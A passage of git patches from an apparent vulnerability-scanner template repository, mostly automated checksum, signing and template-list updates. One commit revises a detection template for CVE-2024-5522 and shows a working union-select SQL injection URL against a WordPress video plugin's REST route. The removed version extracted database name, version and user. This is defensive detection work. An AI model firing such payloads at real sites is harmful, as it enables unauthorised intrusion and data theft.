insertion(+) diff --git a/http/cves/2024/CVE-2024-32709.yaml b/http/cves/2024/CVE-2024-32709.yaml index 575f296b2a..01d5767542 100644 --- a/http/cves/2024/CVE-2024-32709.yaml +++ b/http/cves/2024/CVE-2024-32709.yaml @@ -43,3 +43,4 @@ http: - type: status status: - 200 +# digest: 490a004630440220133ca9cf2f1029c377a0637602b2f99279abe7bbcad1da1f3e66733f6563d26e02207da0cf317afc9c589b8a2c4e7551e7613d75b026f1d89f2fd06642435a38b96f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From e10bfb6d241095040bce0ce2ffeb72bce050a31c Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 1 Jul 2024 11:44:17 +0530 Subject: [PATCH 0754/1841] updated matcher & req --- http/cves/2024/CVE-2024-5522.yaml | 40 ++++++++++++++----------------- 1 file changed, 18 insertions(+), 22 deletions(-) diff --git a/http/cves/2024/CVE-2024-5522.yaml b/http/cves/2024/CVE-2024-5522.yaml index 0ffb9523a9..5f7cc0286f 100644 --- a/http/cves/2024/CVE-2024-5522.yaml +++ b/http/cves/2024/CVE-2024-5522.yaml @@ -1,46 +1,42 @@ id: CVE-2024-5522 info: - name: WordPress H5VP Plugin <= 2.5.26 - SQL Injection + name: WordPress HTML5 Video Player < 2.5.27 - SQL Injection author: JohnDoeAnonITA - severity: high + severity: critical description: | The HTML5 Video Player WordPress plugin before 2.5.27 does not sanitize and escape a parameter from a REST route before using it in a SQL statement, allowing unauthenticated users to perform SQL injection attacks + remediation: Fixed in 2.5.27 reference: - - https://nvd.nist.gov/vuln/detail/CVE-2024-5522 - https://wpscan.com/vulnerability/bc76ef95-a2a9-4185-8ed9-1059097a506a/ + - https://nvd.nist.gov/vuln/detail/CVE-2024-5522 classification: - cvss-score: 10 + cvss-score: 9.8 + cwe-id: CWE-89 cve-id: CVE-2024-5522 epss-score: 0.04 epss-percentile: 9 metadata: - verified: false + verified: true max-request: 1 - tags: wpscan,cve,cve2024,wordpress,wp-plugin,wp,sqli,h5vp + publicwww-query: "/wp-content/plugins/html5-video-player" + tags: wpscan,cve,cve2024,wordpress,wp-plugin,wp,sqli,html5-video-player +variables: + num: "999999999" http: - method: GET path: - - "{{BaseURL}}/wp-json/h5vp/v1/video/0?id='+union all select concat(0x64617461626173653a,database(),0x7c76657273696f6e3a,version(),0x7c757365723a,user()),2,3,4,5,6,7,8-- -" - redirects: true - max-redirects: 3 - headers: - Cookie: "instawp_skip_splash=true; path=/" + - "{{BaseURL}}/wp-json/h5vp/v1/video/0?id='+union all select concat(0x64617461626173653a,1,0x7c76657273696f6e3a,2,0x7c757365723a,md5({{num}})),2,3,4,5,6,7,8-- -" + matchers-condition: and matchers: + - type: word + part: body + words: + - '{{md5(num)}}' + - type: status status: - 200 - - type: regex - regex: - - "database:.*\\|version:.*\\|user:.*" - part: body - - extractors: - - type: regex - part: body - group: 1 - regex: - - ":\"*([^,]+),\"tit" \ No newline at end of file From 86539c0a32dc13fa348573f9042fd0dd7e523d00 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 1 Jul 2024 08:14:16 +0000 Subject: [PATCH 0755/1841] Auto Generated New Template Addition List [Mon Jul 1 08:14:16 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 3f05ae1573..67a81370cd 100644 --- a/.new-additions +++ b/.new-additions @@ -7,6 +7,7 @@ http/cves/2024/CVE-2024-37881.yaml http/cves/2024/CVE-2024-6028.yaml http/default-logins/caprover/caprover-default-login.yaml http/default-logins/jeedom/jeedom-default-login.yaml +http/exposed-panels/apache/apache-apollo-panel.yaml http/exposures/configs/filestash-admin-config.yaml http/exposures/configs/neo4j-neodash-config.yaml http/misconfiguration/forgejo-repo-exposure.yaml From ddb569baf2527f5b76c0618b8e4f6bbc0d4f9a04 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 1 Jul 2024 08:14:20 +0000 Subject: [PATCH 0756/1841] Auto Generated Templates Checksum [Mon Jul 1 08:14:20 UTC 2024] :robot: --- templates-checksum.txt | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 2985f13656..71eb95ca83 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -223,8 +223,8 @@ code/privilege-escalation/linux/rw-sudoers.yaml:f974b1d1a68fd7a8cd24b6f1b61855dd code/privilege-escalation/linux/sudo-nopasswd.yaml:3117c141f35b9229b6ebe1db10a4fef77aa6ee17 code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b52b91940172d070e9 contributors.json:951e2ab8bbae42da01f52da9ef0a14ce7f17e159 -cves.json:0e1abd7e0878adfc9d44b61993564da40d25ffb4 -cves.json-checksum.txt:8adcdbf646b2e7a243ac4aeddcce3e475ea8a0ef +cves.json:824712a75485cc4bdccfb6decd3525d38b63b459 +cves.json-checksum.txt:688dfaaffcf457f513b140d3aea4d7c0aa6e1a88 dast/cves/2018/CVE-2018-19518.yaml:3407e99af553fe5bdb0ffc001a4132e169c55730 dast/cves/2021/CVE-2021-45046.yaml:a52633e88957969fb09969be45c0a8606ee3d752 dast/cves/2022/CVE-2022-34265.yaml:e006df0567f928e43d40050f55d5928a3fbff17e @@ -3439,7 +3439,7 @@ http/cves/2024/CVE-2024-32113.yaml:d33bf2b38e8bb82edabfe4a94fa64fe2aed6cf56 http/cves/2024/CVE-2024-32399.yaml:d49df2f63485c7f67792285af884f5daa53513b5 http/cves/2024/CVE-2024-32640.yaml:6d2dacc8495a3cd5bf446bd3a1227b8c15c2fd74 http/cves/2024/CVE-2024-32651.yaml:801c05cf9fff8ede1e378acbaa7f52b17174a55c -http/cves/2024/CVE-2024-32709.yaml:ddcd45b6f183564f49784d435acdbd5f4714f795 +http/cves/2024/CVE-2024-32709.yaml:8d0c8b5a8814e6437e9c2473dd6ac3af22f8333e http/cves/2024/CVE-2024-3273.yaml:fe07da69c4e263410727d688d92f4e06000f5c00 http/cves/2024/CVE-2024-3274.yaml:b56159631d06052a408c3897ef043b866ce0514c http/cves/2024/CVE-2024-33288.yaml:021f1910a0468103d59167ac39fc9cf77f246bab @@ -3712,6 +3712,7 @@ http/exposed-panels/anaqua-login-panel.yaml:1cedd9bc44fce306dcee81d9d7b458a5b6f1 http/exposed-panels/ansible-semaphore-panel.yaml:8915ed933a720aa66d9e3ec25ac11bc215e542b3 http/exposed-panels/ansible-tower-exposure.yaml:ecb6ec8de956656024905379c2a942e39292d02b http/exposed-panels/apache/apache-apisix-panel.yaml:bb450193e4bb5cab9462c5776ffe1406890779e0 +http/exposed-panels/apache/apache-apollo-panel.yaml:5e65cd92fb6304d8b567d3f4858dad3e76fe65e6 http/exposed-panels/apache/apache-mesos-panel.yaml:50070584a2290a596afb1f2df713ed58c9f08c71 http/exposed-panels/apache/public-tomcat-manager.yaml:b09181c5fb371755c05e371c4dde009b27647311 http/exposed-panels/apache-jmeter-dashboard.yaml:f046007d3840b1bfe603507065cc0f53b3a51cf6 @@ -8809,7 +8810,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:2347dea70c661f2288793bcb3b25185b3259e68a +templates-checksum.txt:b15aead3569bb2762fbe60efba127209f1154ae7 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 15f261a590d0caba0967db97fa5514092ca19d56 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 1 Jul 2024 08:15:03 +0000 Subject: [PATCH 0757/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 2d7438a2ae..309b3bdc82 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -12,6 +12,7 @@ on: - 'http/cves/2024/CVE-2024-6028.yaml' - 'http/default-logins/caprover/caprover-default-login.yaml' - 'http/default-logins/jeedom/jeedom-default-login.yaml' + - 'http/exposed-panels/apache/apache-apollo-panel.yaml' - 'http/exposures/configs/filestash-admin-config.yaml' - 'http/exposures/configs/neo4j-neodash-config.yaml' - 'http/misconfiguration/forgejo-repo-exposure.yaml' From 99d9c863b6d678f7991d7abb70daf6e8b5356c21 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 1 Jul 2024 08:15:42 +0000 Subject: [PATCH 0758/1841] Auto Generated New Template Addition List [Mon Jul 1 08:15:42 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 67a81370cd..b5d993fc80 100644 --- a/.new-additions +++ b/.new-additions @@ -5,6 +5,7 @@ http/cves/2024/CVE-2024-34102.yaml http/cves/2024/CVE-2024-37152.yaml http/cves/2024/CVE-2024-37881.yaml http/cves/2024/CVE-2024-6028.yaml +http/default-logins/apache/apache-apollo-default-login.yaml http/default-logins/caprover/caprover-default-login.yaml http/default-logins/jeedom/jeedom-default-login.yaml http/exposed-panels/apache/apache-apollo-panel.yaml From 77cad241c8628fba0d6de79ae1d312f31b212181 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 1 Jul 2024 08:15:50 +0000 Subject: [PATCH 0759/1841] Auto Generated Templates Checksum [Mon Jul 1 08:15:50 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 71eb95ca83..7dbda0b007 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3482,6 +3482,7 @@ http/default-logins/alphaweb/alphaweb-default-login.yaml:c70e96a6e9ed34b5fe721cc http/default-logins/ambari/ambari-default-login.yaml:c7f2072fb639a02e718d877dcc7369f02f4a8cfe http/default-logins/ampjuke-default-login.yaml:80f58e7f436f698938228565a8b02626e5c287ca http/default-logins/apache/airflow-default-login.yaml:f4a72dcfe661dbfb227717d3201877b185af4d7b +http/default-logins/apache/apache-apollo-default-login.yaml:a4ed0475418c3d6d1d5b1a6493781ed1c0a96c27 http/default-logins/apache/apisix-default-login.yaml:88d0d5d11425c2cadb204d0afb7b26d8df4376fe http/default-logins/apache/dolphinscheduler-default-login.yaml:1e4031c994ea6c6aa571dad9a5e7ccbf908e2251 http/default-logins/apache/dubbo-admin-default-login.yaml:1e96758e87c9540e0f40a4eaa04518a23f64eb28 @@ -8810,7 +8811,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:b15aead3569bb2762fbe60efba127209f1154ae7 +templates-checksum.txt:7c93efbd7728c577a6734cb383433c361440c805 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 04efa7e3b62c726d64c776acd72cc6249c94631a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 1 Jul 2024 08:16:07 +0000 Subject: [PATCH 0760/1841] Auto Template Signing [Mon Jul 1 08:16:07 UTC 2024] :robot: --- http/exposed-panels/apache/apache-apollo-panel.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/exposed-panels/apache/apache-apollo-panel.yaml b/http/exposed-panels/apache/apache-apollo-panel.yaml index a715aca0d5..3d34aaf1a4 100644 --- a/http/exposed-panels/apache/apache-apollo-panel.yaml +++ b/http/exposed-panels/apache/apache-apollo-panel.yaml @@ -25,3 +25,4 @@ http: - type: status status: - 200 +# digest: 4a0a0047304502210091d96867344b35c42563552bc564b4182466d6cac4abee2d338984b6e1cdd7d6022074f11714cb13bb709904658251bcccfdc4edba265448bd850d731a800f148d77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 5f0410e2d8fe44cc5e3d78be81b99ee40a701333 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 1 Jul 2024 08:16:57 +0000 Subject: [PATCH 0761/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 309b3bdc82..6c3dfcd8eb 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -10,6 +10,7 @@ on: - 'http/cves/2024/CVE-2024-37152.yaml' - 'http/cves/2024/CVE-2024-37881.yaml' - 'http/cves/2024/CVE-2024-6028.yaml' + - 'http/default-logins/apache/apache-apollo-default-login.yaml' - 'http/default-logins/caprover/caprover-default-login.yaml' - 'http/default-logins/jeedom/jeedom-default-login.yaml' - 'http/exposed-panels/apache/apache-apollo-panel.yaml' From b6931c0819a4b59f18458bc706458e6fa6edd28f Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 1 Jul 2024 08:17:10 +0000 Subject: [PATCH 0762/1841] Auto Generated New Template Addition List [Mon Jul 1 08:17:10 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index b5d993fc80..f6494bda4f 100644 --- a/.new-additions +++ b/.new-additions @@ -9,6 +9,7 @@ http/default-logins/apache/apache-apollo-default-login.yaml http/default-logins/caprover/caprover-default-login.yaml http/default-logins/jeedom/jeedom-default-login.yaml http/exposed-panels/apache/apache-apollo-panel.yaml +http/exposed-panels/dialogic-xms-console.yaml http/exposures/configs/filestash-admin-config.yaml http/exposures/configs/neo4j-neodash-config.yaml http/misconfiguration/forgejo-repo-exposure.yaml From 2a97f57d47a9b0c94106f700e8494e51cfde9431 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 1 Jul 2024 08:17:38 +0000 Subject: [PATCH 0763/1841] Auto Generated Templates Checksum [Mon Jul 1 08:17:38 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 7dbda0b007..e708815c13 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3713,7 +3713,7 @@ http/exposed-panels/anaqua-login-panel.yaml:1cedd9bc44fce306dcee81d9d7b458a5b6f1 http/exposed-panels/ansible-semaphore-panel.yaml:8915ed933a720aa66d9e3ec25ac11bc215e542b3 http/exposed-panels/ansible-tower-exposure.yaml:ecb6ec8de956656024905379c2a942e39292d02b http/exposed-panels/apache/apache-apisix-panel.yaml:bb450193e4bb5cab9462c5776ffe1406890779e0 -http/exposed-panels/apache/apache-apollo-panel.yaml:5e65cd92fb6304d8b567d3f4858dad3e76fe65e6 +http/exposed-panels/apache/apache-apollo-panel.yaml:d59ff5e5c67ee21b30c00b8a29b2ca53b61c925e http/exposed-panels/apache/apache-mesos-panel.yaml:50070584a2290a596afb1f2df713ed58c9f08c71 http/exposed-panels/apache/public-tomcat-manager.yaml:b09181c5fb371755c05e371c4dde009b27647311 http/exposed-panels/apache-jmeter-dashboard.yaml:f046007d3840b1bfe603507065cc0f53b3a51cf6 @@ -3916,6 +3916,7 @@ http/exposed-panels/dell-wyse-login.yaml:cf7eb2f7e89c30f8f731927225292f17464001f http/exposed-panels/delta-login-panel.yaml:267b229446b591002e087e0e97ef21cc89e69553 http/exposed-panels/deluge-webui-panel.yaml:c96ecc227eb8e9ee6ce92d640f4f13d615efbafb http/exposed-panels/dericam-login.yaml:36507c070822641fa657c4571b0168973bc3fbf7 +http/exposed-panels/dialogic-xms-console.yaml:200eef9433237f82b981f554c4fec3b5b4280594 http/exposed-panels/digital-watchdog-panel.yaml:ee2414d7e176c9862439161eea88f8d9c99bdee2 http/exposed-panels/digitalrebar-login.yaml:d101f39355252945c32214f021f7fe05083ccc81 http/exposed-panels/directadmin-login-panel.yaml:d24157b302a3ac4c168decc4fd3ccb91a8a73753 @@ -8811,7 +8812,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:7c93efbd7728c577a6734cb383433c361440c805 +templates-checksum.txt:e46fa10a3022c82114e7407afd3bb77daf1606f9 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 43720cbdedf6e774e06916b3bbb10961bc17d911 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 1 Jul 2024 13:47:52 +0530 Subject: [PATCH 0764/1841] Update and rename http/default-logins/dialogic-xms-default-login.yaml to http/default-logins/dialogic/dialogic-xms-default-login.yaml --- .../{ => dialogic}/dialogic-xms-default-login.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) rename http/default-logins/{ => dialogic}/dialogic-xms-default-login.yaml (85%) diff --git a/http/default-logins/dialogic-xms-default-login.yaml b/http/default-logins/dialogic/dialogic-xms-default-login.yaml similarity index 85% rename from http/default-logins/dialogic-xms-default-login.yaml rename to http/default-logins/dialogic/dialogic-xms-default-login.yaml index 6c843f01a0..3fd04e7789 100644 --- a/http/default-logins/dialogic-xms-default-login.yaml +++ b/http/default-logins/dialogic/dialogic-xms-default-login.yaml @@ -4,11 +4,13 @@ info: name: Dialogic XMS Admin Console - Default Login author: ritikchaddha severity: high + description: | + Dialogic XMS Admin Console was using default credentials and it was discovered. metadata: verified: true max-request: 1 shodan-query: title:"Dialogic XMS Admin Console" - tags: dialogic,admin,default-login,misconfig + tags: dialogic,admin,default-login http: - raw: From e3b7f5cc4d90b7b2cd21f8d56d5e853a29043eb9 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 1 Jul 2024 08:17:55 +0000 Subject: [PATCH 0765/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 6c3dfcd8eb..f9f3307171 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -14,6 +14,7 @@ on: - 'http/default-logins/caprover/caprover-default-login.yaml' - 'http/default-logins/jeedom/jeedom-default-login.yaml' - 'http/exposed-panels/apache/apache-apollo-panel.yaml' + - 'http/exposed-panels/dialogic-xms-console.yaml' - 'http/exposures/configs/filestash-admin-config.yaml' - 'http/exposures/configs/neo4j-neodash-config.yaml' - 'http/misconfiguration/forgejo-repo-exposure.yaml' From 1ee537c5d6bea7f666d15a9c61b4ec3c78f01bb1 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 1 Jul 2024 08:18:54 +0000 Subject: [PATCH 0766/1841] Auto Template Signing [Mon Jul 1 08:18:54 UTC 2024] :robot: --- http/default-logins/apache/apache-apollo-default-login.yaml | 1 + http/exposed-panels/dialogic-xms-console.yaml | 1 + 2 files changed, 2 insertions(+) diff --git a/http/default-logins/apache/apache-apollo-default-login.yaml b/http/default-logins/apache/apache-apollo-default-login.yaml index 36a3d9b46a..18edcf7013 100644 --- a/http/default-logins/apache/apache-apollo-default-login.yaml +++ b/http/default-logins/apache/apache-apollo-default-login.yaml @@ -45,3 +45,4 @@ http: - type: status status: - 200 +# digest: 490a004630440220316d56568350165547ed1cb488565e14ecae67a775aea47af5d671124b563a5b022040877ad8cc3beae83a8717a9b7d014c5216d3b5acabd097d97d2cdeea26ee151:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/dialogic-xms-console.yaml b/http/exposed-panels/dialogic-xms-console.yaml index 480d119235..c877417831 100644 --- a/http/exposed-panels/dialogic-xms-console.yaml +++ b/http/exposed-panels/dialogic-xms-console.yaml @@ -25,3 +25,4 @@ http: - type: status status: - 200 +# digest: 4a0a0047304502204578749594ab0de3efbed02e03712e1574900fdacebe35c859373035b07c1cd1022100f3876c7944b735829649627acc9e128ac5f3b2d128043e3b2aca0566c262acd8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From d862309c8d6918c84f6dd461b92186bd73df8a90 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 1 Jul 2024 08:19:30 +0000 Subject: [PATCH 0767/1841] Auto Generated New Template Addition List [Mon Jul 1 08:19:30 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index f6494bda4f..2d0b568e02 100644 --- a/.new-additions +++ b/.new-additions @@ -4,6 +4,7 @@ http/cves/2024/CVE-2024-32709.yaml http/cves/2024/CVE-2024-34102.yaml http/cves/2024/CVE-2024-37152.yaml http/cves/2024/CVE-2024-37881.yaml +http/cves/2024/CVE-2024-5522.yaml http/cves/2024/CVE-2024-6028.yaml http/default-logins/apache/apache-apollo-default-login.yaml http/default-logins/caprover/caprover-default-login.yaml From 759877691eba047f7f3615dfc77c8f3cf6be4c26 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 1 Jul 2024 08:19:40 +0000 Subject: [PATCH 0768/1841] Auto Generated Templates Checksum [Mon Jul 1 08:19:40 UTC 2024] :robot: --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index e708815c13..de450b7bf8 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3466,6 +3466,7 @@ http/cves/2024/CVE-2024-4443.yaml:bd877d88a3381249f47f17961c167cb8ae3bfaa9 http/cves/2024/CVE-2024-4577.yaml:c53e4d3f699e49597036f2b9e5ea8ab75e67904b http/cves/2024/CVE-2024-4956.yaml:c6be2d64ff4b985c30acc88c57c66d57a846d25a http/cves/2024/CVE-2024-5230.yaml:8b073f5f6aa9e22b66403c2c6297fb487fbade0c +http/cves/2024/CVE-2024-5522.yaml:2c28dad17650907937ec00e854a67c4b7f6fc7da http/cves/2024/CVE-2024-6028.yaml:5bb353f3acbac441334cb7219e4198515178e991 http/default-logins/3com/3Com-wireless-default-login.yaml:80e8ff28f6fe58cd692d51a649e382978ba730c3 http/default-logins/3com/3com-nj2000-default-login.yaml:3c260ca4c2ee7809221fc4b9330a540795c081ce @@ -3482,7 +3483,7 @@ http/default-logins/alphaweb/alphaweb-default-login.yaml:c70e96a6e9ed34b5fe721cc http/default-logins/ambari/ambari-default-login.yaml:c7f2072fb639a02e718d877dcc7369f02f4a8cfe http/default-logins/ampjuke-default-login.yaml:80f58e7f436f698938228565a8b02626e5c287ca http/default-logins/apache/airflow-default-login.yaml:f4a72dcfe661dbfb227717d3201877b185af4d7b -http/default-logins/apache/apache-apollo-default-login.yaml:a4ed0475418c3d6d1d5b1a6493781ed1c0a96c27 +http/default-logins/apache/apache-apollo-default-login.yaml:c20802affb7034ce37d2508c867a48010bf59ded http/default-logins/apache/apisix-default-login.yaml:88d0d5d11425c2cadb204d0afb7b26d8df4376fe http/default-logins/apache/dolphinscheduler-default-login.yaml:1e4031c994ea6c6aa571dad9a5e7ccbf908e2251 http/default-logins/apache/dubbo-admin-default-login.yaml:1e96758e87c9540e0f40a4eaa04518a23f64eb28 @@ -3916,7 +3917,7 @@ http/exposed-panels/dell-wyse-login.yaml:cf7eb2f7e89c30f8f731927225292f17464001f http/exposed-panels/delta-login-panel.yaml:267b229446b591002e087e0e97ef21cc89e69553 http/exposed-panels/deluge-webui-panel.yaml:c96ecc227eb8e9ee6ce92d640f4f13d615efbafb http/exposed-panels/dericam-login.yaml:36507c070822641fa657c4571b0168973bc3fbf7 -http/exposed-panels/dialogic-xms-console.yaml:200eef9433237f82b981f554c4fec3b5b4280594 +http/exposed-panels/dialogic-xms-console.yaml:7865c2e2729231058008c1a9fac7794f3f37b2c9 http/exposed-panels/digital-watchdog-panel.yaml:ee2414d7e176c9862439161eea88f8d9c99bdee2 http/exposed-panels/digitalrebar-login.yaml:d101f39355252945c32214f021f7fe05083ccc81 http/exposed-panels/directadmin-login-panel.yaml:d24157b302a3ac4c168decc4fd3ccb91a8a73753 @@ -8812,7 +8813,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:e46fa10a3022c82114e7407afd3bb77daf1606f9 +templates-checksum.txt:4cfe3a5893a0c2a7f6194a5b1dcfa92e1ca6baef wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 050bd02eb8738f7549b1c7ab83958c0938b14228 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 1 Jul 2024 08:20:26 +0000 Subject: [PATCH 0769/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index f9f3307171..edc1a08a08 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -9,6 +9,7 @@ on: - 'http/cves/2024/CVE-2024-34102.yaml' - 'http/cves/2024/CVE-2024-37152.yaml' - 'http/cves/2024/CVE-2024-37881.yaml' + - 'http/cves/2024/CVE-2024-5522.yaml' - 'http/cves/2024/CVE-2024-6028.yaml' - 'http/default-logins/apache/apache-apollo-default-login.yaml' - 'http/default-logins/caprover/caprover-default-login.yaml' From 450078766436d9aac0824bf97aa379e6ec8bdd2d Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 1 Jul 2024 08:21:13 +0000 Subject: [PATCH 0770/1841] Auto Generated New Template Addition List [Mon Jul 1 08:21:12 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 2d0b568e02..13881f7852 100644 --- a/.new-additions +++ b/.new-additions @@ -8,6 +8,7 @@ http/cves/2024/CVE-2024-5522.yaml http/cves/2024/CVE-2024-6028.yaml http/default-logins/apache/apache-apollo-default-login.yaml http/default-logins/caprover/caprover-default-login.yaml +http/default-logins/dialogic/dialogic-xms-default-login.yaml http/default-logins/jeedom/jeedom-default-login.yaml http/exposed-panels/apache/apache-apollo-panel.yaml http/exposed-panels/dialogic-xms-console.yaml From d51a21c835f6efe0d530f05cd008dff4c16c5ef0 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 1 Jul 2024 08:21:17 +0000 Subject: [PATCH 0771/1841] Auto Generated Templates Checksum [Mon Jul 1 08:21:16 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index de450b7bf8..da942806e7 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3520,6 +3520,7 @@ http/default-logins/dell/dell-dpi-default-login.yaml:c8dabcfcdb39d6a22dd877512d2 http/default-logins/dell/dell-idrac-default-login.yaml:1dc3a2376aeb7ca1b68b49de2fb293c5d3f988d5 http/default-logins/dell/dell-idrac9-default-login.yaml:ff8233327b0de4c8fad6255f51c14ec0771fb8de http/default-logins/dell/emcecom-default-login.yaml:67e9a911b490370e01545f18a1ed6adbb5333fb8 +http/default-logins/dialogic/dialogic-xms-default-login.yaml:2d776bba7a7f5510dd6a8e29ff325a9d3be3db18 http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml:757e37421ad654500aeb166c26016e839e77f176 http/default-logins/digitalrebar/digitalrebar-default-login.yaml:87a2a0df776e6ceab4b3a02845b43bf93f6d3ada http/default-logins/druid/druid-default-login.yaml:cdf960a64c7f527a149b2a1b5cf62b7d40c4aeee @@ -8813,7 +8814,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:4cfe3a5893a0c2a7f6194a5b1dcfa92e1ca6baef +templates-checksum.txt:eb9850043f870569f04715c8bb1a351278584bc3 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 